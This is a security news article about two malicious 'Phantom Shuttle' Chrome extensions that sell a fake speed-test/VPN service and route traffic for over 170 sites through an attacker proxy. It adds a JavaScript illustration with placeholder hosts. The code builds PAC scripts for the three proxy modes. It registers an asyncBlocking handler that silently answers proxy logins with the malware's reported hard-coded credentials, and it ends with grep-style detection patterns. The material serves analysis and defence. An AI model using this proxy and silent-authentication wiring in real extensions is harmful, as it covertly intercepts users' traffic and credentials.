Malicious Chrome Extensions Route Traffic Through Attacker Proxies to Steal Credentials from 170+ Sites
Security researchers have uncovered two malicious Google Chrome extensions, both named Phantom Shuttle and published by the same developer, that intercept web traffic and capture credentials while posing as a multi-location network speed test plug-in for developers and foreign-trade users.
Both add-ons were available for download at the time of reporting. The two variants are Phantom Shuttle (ID: fbfldogmkadejddihifklefknmikncaj), with about 2,000 users (published Nov. 26, 2017), and Phantom Shuttle (ID: ocpcmfmiidofonkbodpdhgddhlcmcofd), with about 180 users (published Apr. 27, 2023). Subscriptions range from ¥9.9 to ¥95.9 CNY ($1.40–$13.50), which victims pay believing they are buying a VPN-style service. Socket security researcher Kush Pandya said the extensions enable a “smarty” proxy mode after payment, route traffic for more than 170 targeted domains through an attacker-controlled C2 server, and continuously exfiltrate data.
The add-ons modify bundled JavaScript (jquery-1.12.2.min.js and scripts.js) and register a chrome.webRequest.onAuthRequired listener that answers the proxy's authentication challenge with hard-coded credentials (topfany / 963852wei). Because the listener is registered with asyncBlocking, the challenge is satisfied before Chrome can show the user a credential prompt. The extensions then point Chrome at a PAC script offering three modes: close (proxying disabled), always (all traffic through the proxy), and smarty (only a hard-coded list of high-value sites through the proxy, so the rest of the victim's browsing looks untouched). Nothing here requires an exploit: the proxy and webRequest permissions (with webRequestAuthProvider under Manifest V3) are enough, so an extension that requests them while advertising a speed test is the signal to look for.
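The proxy configuration and the silent proxy authentication described above, as an added example that is not the extensions' own code: it builds the PAC text for the three modes, evaluates it offline, shows the shape of an asyncBlocking onAuthRequired handler, and ends with a grep-style triage check a reviewer can run over unpacked extension sources. The proxy address proxy.example:3128, the two target domains and every function name are assumptions; only the three mode names and the reported username/password come from the article.

```javascript
// Added illustration of the mechanisms described in the article. This is NOT
// the Phantom Shuttle code: the proxy address, target domains and function
// names are constructed placeholders; only the mode names and the reported
// username/password come from the write-up.

const PROXY = "proxy.example:3128"; // hypothetical; the real C2 host is not given in the article
const SMARTY_TARGETS = ["mail.example.com", "bank.example.net"]; // constructed stand-ins for the 170+ domains
const HARDCODED = { username: "topfany", password: "963852wei" }; // credentials as reported

// Build the PAC script text for one of the three modes. In "smarty" mode only
// the listed domains (and their subdomains) are proxied, so ordinary browsing,
// including the advertised speed test, behaves normally.
function buildPacScript(mode, proxy = PROXY, targets = SMARTY_TARGETS) {
  switch (mode) {
    case "close":
      return "function FindProxyForURL(url, host) { return 'DIRECT'; }";
    case "always":
      return `function FindProxyForURL(url, host) { return 'PROXY ${proxy}'; }`;
    case "smarty":
      return `function FindProxyForURL(url, host) {
  var targets = ${JSON.stringify(targets)};
  for (var i = 0; i < targets.length; i++) {
    if (host === targets[i] || dnsDomainIs(host, "." + targets[i])) {
      return "PROXY ${proxy}";
    }
  }
  return "DIRECT";
}`;
    default:
      throw new Error("unknown proxy mode: " + mode);
  }
}

// Evaluate a PAC script offline for one request, supplying the dnsDomainIs()
// helper that the browser's PAC sandbox would normally provide.
function evaluatePac(pacText, url, host) {
  const dnsDomainIs = (h, domain) => h.endsWith(domain);
  const find = new Function("dnsDomainIs", pacText + "\nreturn FindProxyForURL;")(dnsDomainIs);
  return find(url, host);
}

// Decide how to answer an authentication challenge. Only proxy (407) challenges
// get the hard-coded credentials; normal website 401s are left alone.
function authResponse(details) {
  return details.isProxy ? { authCredentials: HARDCODED } : {};
}

// Shape of an onAuthRequired listener registered with ["asyncBlocking"]:
// Chrome passes (details, asyncCallback) and waits for the callback, so the
// proxy challenge is satisfied before any credential prompt could appear.
function handleAuthRequired(details, asyncCallback) {
  asyncCallback(authResponse(details));
}

// Wiring as it would appear inside the extension (not executed here; `chrome`
// only exists in an extension context). Needs the "proxy" and "webRequest"
// permissions, plus "webRequestAuthProvider" under Manifest V3.
function installProxy(mode) {
  chrome.proxy.settings.set(
    { value: { mode: "pac_script", pacScript: { data: buildPacScript(mode) } }, scope: "regular" }
  );
  chrome.webRequest.onAuthRequired.addListener(
    handleAuthRequired, { urls: ["<all_urls>"] }, ["asyncBlocking"]
  );
}

// Triage heuristic for unpacked extension sources: the three together are a
// strong signal that an extension silently reroutes traffic through an
// authenticated proxy. Returns the names of the indicators found.
const INDICATORS = {
  pacScript: /proxy\.settings\.set[\s\S]{0,200}pac_script/,
  authListener: /onAuthRequired\.addListener/,
  asyncBlocking: /["']asyncBlocking["']/,
};

function triageIndicators(source) {
  return Object.keys(INDICATORS).filter((name) => INDICATORS[name].test(source));
}

// Stand-alone demo: which route each mode picks for a targeted and a non-targeted host.
for (const mode of ["close", "always", "smarty"]) {
  const pac = buildPacScript(mode);
  console.log(mode, "login.bank.example.net ->", evaluatePac(pac, "https://login.bank.example.net/", "login.bank.example.net"));
  console.log(mode, "speedtest.example ->", evaluatePac(pac, "https://speedtest.example/", "speedtest.example"));
}
console.log("indicators in installProxy():", triageIndicators(installProxy.toString()));
```

Run it with node. The triage regexes are deliberately loose: a legitimate enterprise proxy helper can hit all three, so treat a match as a reason to read the PAC text and the credential source, not as a verdict on its own.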
Key Topics
Crypto, Tech, Cybersecurity, Chrome Extensions, Malware, Proxy, Data Theft